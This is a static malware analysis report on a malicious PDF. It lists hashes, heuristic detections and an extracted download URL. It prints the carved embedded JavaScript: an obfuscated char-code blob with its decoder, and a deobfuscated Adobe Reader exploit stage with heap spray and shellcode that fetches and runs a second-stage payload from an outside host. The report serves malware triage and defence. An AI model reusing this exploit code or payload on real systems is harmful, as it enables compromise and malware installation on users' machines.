Malicious PDF — malware analysis report

Static analysis result for SHA-256 eab858df2ff4bc5a…

MALICIOUS

PDF

3.6 KB First seen: 2026-05-08
MD5: 43bdb9060606d49da8cefcd2ce08cf3e SHA-1: 0f21f4b3fe9a47254be90d38184b77082c873aa4 SHA-256: eab858df2ff4bc5add7b2620bf13a3407906a7f437ecde0504899b82cf8c5c9a
158 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and embedded JS streams. The deobfuscated JavaScript, named 'legacy_pdfkit_stage_000.js', likely attempts to download and execute a second-stage payload. The obfuscation and the nature of the embedded script suggest downloader or dropper functionality, common in the initial access stage of malware delivery. Due to the obfuscation, the exact payload and delivery mechanism cannot be fully determined from static analysis alone.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://splo.in/x/p.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x107 8761 bytes
SHA-256: 7c4d082f497cb065886e7209de23ab89fa7f381a4479f1d7c00e1c74539178a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "10,118,97,114,32,112,112,112,32,61,32,34,34,43,34,37,34,59,10,118,97,114,32,112,112,112,50,32,61,32,34,34,43,34,97,34,59,10,102,117,110,99,116,105,111,110,32,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,41,10,123,10,105,102,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,32,61,61,49,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,32,114,101,116,117,114,110,32,40,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,34,34,43,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,32,32,97,112,112,91,34,118,34,43,34,105,101,34,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,43,34,34,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,43,34,119,101,114,84,121,34,43,97,112,112,46,100,111,99,91,34,85,34,43,34,34,43,34,82,76,34,93,91,51,93,43,34,101,34,93,91,49,93,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,41,59,10,105,102,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,32,61,61,50,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,32,114,101,116,117,114,110,32,40,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,34,34,43,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,112,112,112,32,32,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,41,59,10,105,102,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,32,61,61,51,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,32,114,101,116,117,114,110,32,40,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,34,34,43,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,32,32,32,32,112,112,112,50,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,59,10,125,10,10,118,97,114,32,47,42,105,105,105,57,100,57,
57,57,57,57,57,57,57,105,105,105,42,47,66,105,111,72,72,75,75,69,119,87,55,55,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,61,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,116,104,105,115,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,59,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,10,118,97,114,32,99,83,86,122,112,71,72,99,83,103,56,57,32,61,91,34,34,44,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,49,41,44,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,50,41,44,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,51,41,44,34,34,44,34,34,44,34,111,34,44,34,115,34,44,34,99,34,44,34,105,34,44,34,103,34,44,34,116,34,44,34,114,34,44,34,117,34,44,34,110,34,44,34,112,34,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,10,118,97,114,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,66,105,111,72,72,75,75,69,119,87,55,55,122,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,61,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,97,112,112,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,59,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,109,106,83,85,118,68,86,78,68,85,49,32,61,32,99,83,86,122,112,71,72,99,83,103,56,57,91,49,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,89,120,90,114,86,72,116,74,89,102,51,32,61,32,99,83,86,122,112,71,72,99,83,103,56,57,91,50,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,115,66,85,117,105,118,119,76,66,119,49,55,32,61,32,66,105,111,72,72,75,75,69,119,87,55,55,91,109,106,83,85,118,68,86,78,68,85,49,43,34,118,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,34,108,34,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,114,118,120,
69,77,101,116,109,118,117,49,56,32,61,32,66,105,111,72,72,75,75,69,119,87,55,55,91,99,83,86,122,112,71,72,99,83,103,56,57,91,49,51,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,52,93,43,109,106,83,85,118,68,86,78,68,85,49,43,34,115,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,53,93,43,109,106,83,85,118,68,86,78,68,85,49,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,10,115,66,85,117,105,118,119,76,66,119,49,55,40,34,118,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,34,114,32,116,65,77,82,104,111,90,82,66,97,49,53,32,61,32,47,104,105,32,97,118,32,104,97,120,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,34,47,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,57,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,48,93,43,34,59,34,41,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,89,78,85,81,88,81,108,114,90,72,49,48,32,61,32,66,105,111,72,72,75,75,69,119,87,55,55,122,91,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,32,32,32,34,100,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,55,45,49,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,55,43,49,93,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,89,78,85,81,88,81,108,114,90,72,49,48,91,99,83,86,122,112,71,72,99,83,103,56,57,91,55,93,43,34,121,110,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,34,65,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,52,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,52,93,43,34,111,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,49,93,43,34,83,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,34,110,34,93,40,41,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,113,75,79,73,101,75,77,65,89,80,52,32,61,32,89,78,85,81,8
8,81,108,114,90,72,49,48,91,99,83,86,122,112,71,72,99,83,103,56,57,91,49,48,93,43,109,106,83,85,118,68,86,78,68,85,49,43,34,116,65,110,110,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,54,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,49,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,55,93,93,40,48,41,59,10,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,85,107,102,71,110,115,75,115,71,86,53,32,61,32,113,75,79,73,101,75,77,65,89,80,52,91,48,93,91,99,83,86,122,112,71,72,99,83,103,56,57,91,55,93,43,34,117,98,106,34,43,109,106,83,85,118,68,86,78,68,85,49,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,49,93,93,59,10,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,97,101,83,65,87,111,72,80,120,103,54,32,61,32,85,107,102,71,110,115,75,115,71,86,53,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,99,83,86,122,112,71,72,99,83,103,56,57,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,49,49,43,49,93,43,109,106,83,85,118,68,86,78,68,85,49,43,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,99,83,86,122,112,71,72,99,83,103,56,57,91,49,53,93,43,34,108,34,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,43,99,83,86,122,112,71,72,99,83,103,56,57,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,51,93,43,99,83,86,122,112,71,72,99,83,103,56,57,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,56,93,43,109,106,83,85,118,68,86,78,68,85,49,93,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,40,116,65,77,82,104,111,90,82,66,97,49,53,44,89,120,90,114,86,72,116,74,89,102,51,41,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,117,110,114,74,119,86,85,73,86,115,55,61,114,118,120,69,77,101,116,109,118,117,49,56,40,114,118,120,69,77,101,116,109,118,117,49,56,40,97,101,83,65,87,111
,72,80,120,103,54,41,41,59,10,115,66,85,117,105,118,119,76,66,119,49,55,40,117,110,114,74,119,86,85,73,86,115,55,41,59,10,10,105,102,40,106,41,123,10,102,117,110,99,116,105,111,110,32,114,117,110,40,41,123,117,116,105,108,91,118,118,118,50,93,40,118,118,118,44,32,110,101,119,32,68,97,116,101,40,41,41,59,125,10,114,117,110,40,41,59,114,117,110,40,41,59,10,116,114,121,32,123,116,104,105,115,91,118,118,118,52,93,91,118,118,118,51,93,40,110,117,108,108,41,59,125,32,99,97,116,99,104,40,101,41,32,123,125,10,114,117,110,40,41,59,10,125"; 
// Analyst annotation (the carved sample carries no comments of its own):
// decoder for the comma-separated numeric blob held in `sourceCode` above.
// Each token is coerced to a number, shifted down by `jump`, and mapped back to
// a character; the concatenated result is presumably JavaScript source for a
// further stage — confirm by decoding offline in an isolated environment.
// The call site that supplies `jump` and consumes the output is not shown in
// this preview, so the effective offset is not established here.
function decrypt(str, jump){
var result = ""; // decoded text, built one character per token
var list = str.split(','); // one numeric token per output character
        for (var i=0; i < list.length; i++) {
            // `list[i] - jump` coerces the string token to a number before the offset is applied
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x6FE 1220 bytes
SHA-256: d7155f873b59e589a73c704be477a30cf4921d43cb2c81abc4b0960cad6f3280
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u732F%u6C70%u2E6F%u6E69%u782F%u702F%u702E%u7068%u653F%u383D%u2626";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";